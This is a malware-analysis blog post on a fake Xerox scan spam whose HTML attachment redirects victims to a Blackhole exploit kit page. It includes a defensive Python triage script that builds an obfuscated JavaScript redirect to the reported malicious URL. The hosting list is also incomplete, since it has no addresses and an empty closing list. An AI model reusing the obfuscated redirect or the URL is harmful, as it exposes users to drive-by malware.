
Sunday, 12 February 2012

"Scan from a Xerox WorkCentre Pro" spam with malicious attachment / cojsdhfhhlsl.ru

Here's a slightly new twist on a very familiar theme: an email attachment that contains an HTML page with obfuscated JavaScript, leading to malware.

Date:      Sun, 11 Feb 2012 12:26:18 +0100
From:      "JANICE Heller" [KailaStuck@engineeringdesign.com]
Subject:      Re: Scan from a Xerox WorkCentre Pro #383806
Attachments:     Xerox_Doc_X30366.htm

Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.

Sent by: Guest
Number of Images: 8
Attachment File Type: .HTML [Internet Explorer Format]

WorkCentre Pro Location: machine location not set
Device Name: KDX157PS0MSUDX382782

The file Xerox_Doc_X30366.htm contains obfuscated JavaScript that attempts to open a malicious web page at cojsdhfhhlsl.ru:8080/images/aublbzdni.php, which hosts the Blackhole exploit kit (the Wepawet report is here).
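A triage script for this kind of message, added here as an example and not part of the original post. It builds a constructed .eml shaped like the spam above, pulls out every HTML attachment, statically undoes two common string-hiding tricks (String.fromCharCode(...) and unescape("%xx")), extracts any URLs the script tries to reach, and checks the hosts against a blocklist. The attachment body and the blocklist are constructed for the example; only the domain, port and path come from the post.

```python
"""Triage an e-mail carrying an HTML attachment with obfuscated JavaScript.

Added example, not code from the original post. The sample message and
blocklist below are constructed; the landing URL is the one the post reports.
"""
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from urllib.parse import unquote

# Constructed stand-in for the real attachment: the landing URL is hidden as
# char codes and as %xx escapes, then assigned to document.location.
LANDING_URL = "http://cojsdhfhhlsl.ru:8080/images/aublbzdni.php"
_CODES = ",".join(str(ord(c)) for c in LANDING_URL)
_ESCAPED = "".join("%%%02X" % ord(c) for c in LANDING_URL)
SAMPLE_HTML = f"""<html><body><p>Loading document...</p>
<script type="text/javascript">
var a = String.fromCharCode({_CODES});
var b = unescape("{_ESCAPED}");
if (a == b) {{ document.location = a; }}
</script></body></html>"""

# Constructed blocklist; the post's IP list is not reproduced here.
BLOCKLIST = {"cojsdhfhhlsl.ru"}

# Plain URL in the decoded script text; path excludes JS statement terminators.
URL_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})(?::(\d+))?(/[^\s\"'<>;]*)?", re.I)


def build_sample_eml() -> bytes:
    """Construct a message shaped like the spam in the post, with the HTML attached."""
    msg = EmailMessage()
    msg["From"] = "JANICE Heller <KailaStuck@engineeringdesign.com>"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Re: Scan from a Xerox WorkCentre Pro #383806"
    msg.set_content("Please open the attached document.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="Xerox_Doc_X30366.htm")
    return msg.as_bytes()


def decode_js_strings(text: str) -> str:
    """Statically replace String.fromCharCode(n,n,...) and unescape("%xx") literals
    with the strings they produce. Only handles these two tricks; %uXXXX escapes
    and arithmetic on char codes are out of scope."""
    def _fcc(m):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))
    text = re.sub(r"String\.fromCharCode\s*\(([\d\s,]+)\)", _fcc, text)
    text = re.sub(r'unescape\s*\(\s*"([^"]*)"\s*\)', lambda m: unquote(m.group(1)), text)
    return text


def extract_urls(text: str) -> list:
    """Return (host, port, path) tuples for every http(s) URL in the text."""
    return [(m.group(1).lower(), int(m.group(2)) if m.group(2) else 80, m.group(3) or "/")
            for m in URL_RE.finditer(text)]


def triage(raw: bytes, blocklist=BLOCKLIST) -> list:
    """Parse a raw message and report on each HTML attachment it carries."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):
            body = body.decode("utf-8", "replace")
        urls = extract_urls(decode_js_strings(body))
        findings.append({
            "filename": name,
            "has_script": re.search(r"<script\b", body, re.I) is not None,
            "hosts": sorted({h for h, _, _ in urls}),
            # Blackhole landing pages in this campaign sat on port 8080.
            "nonstandard_port": any(p not in (80, 443) for _, p, _ in urls),
            "blocklisted": sorted({h for h, _, _ in urls if h in blocklist}),
        })
    return findings


if __name__ == "__main__":
    for f in triage(build_sample_eml()):
        print(f)
```

In practice you would feed triage() the raw bytes of a quarantined message rather than the constructed sample; the static decoders are deliberately narrow, so an attachment whose script flags has_script but yields no hosts still deserves a look in a sandbox.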

This domain is multihomed on some very familiar looking IP addresses.. in fact, they are almost identical to this spam attack. If you have blocked those IPs then you will be protected against this one as well.

For the record, the IPs and hosts are: (OVH Systems, France) (Amazon Data Services, Ireland) (Steadfast Networks, US) (Slicehost, US) (Slicehost, US) (Comcast Business Communications, US) (Colopronto, US) (iPower, US) (MVN Systems Ltd, Bulgaria) (Neterra Ltd, Bulgaria) (Free SAS / ProXad, France) (SiliconTower, Spain) (Hosting Services Inc, US) (Web24 Pty Ltd, Australia) (Slicehost, US) (Linode, US) (ThePlanet, US) (Slicehost, US) (Slicehost, US) (Slicehost, US) (G2KHosting, Argentina) (Century Telecom Ltda, Brazil) (Jaidee Daijai, US) (Slicehost, US)

If you need a plain listing for pasting into a blocklist, use:
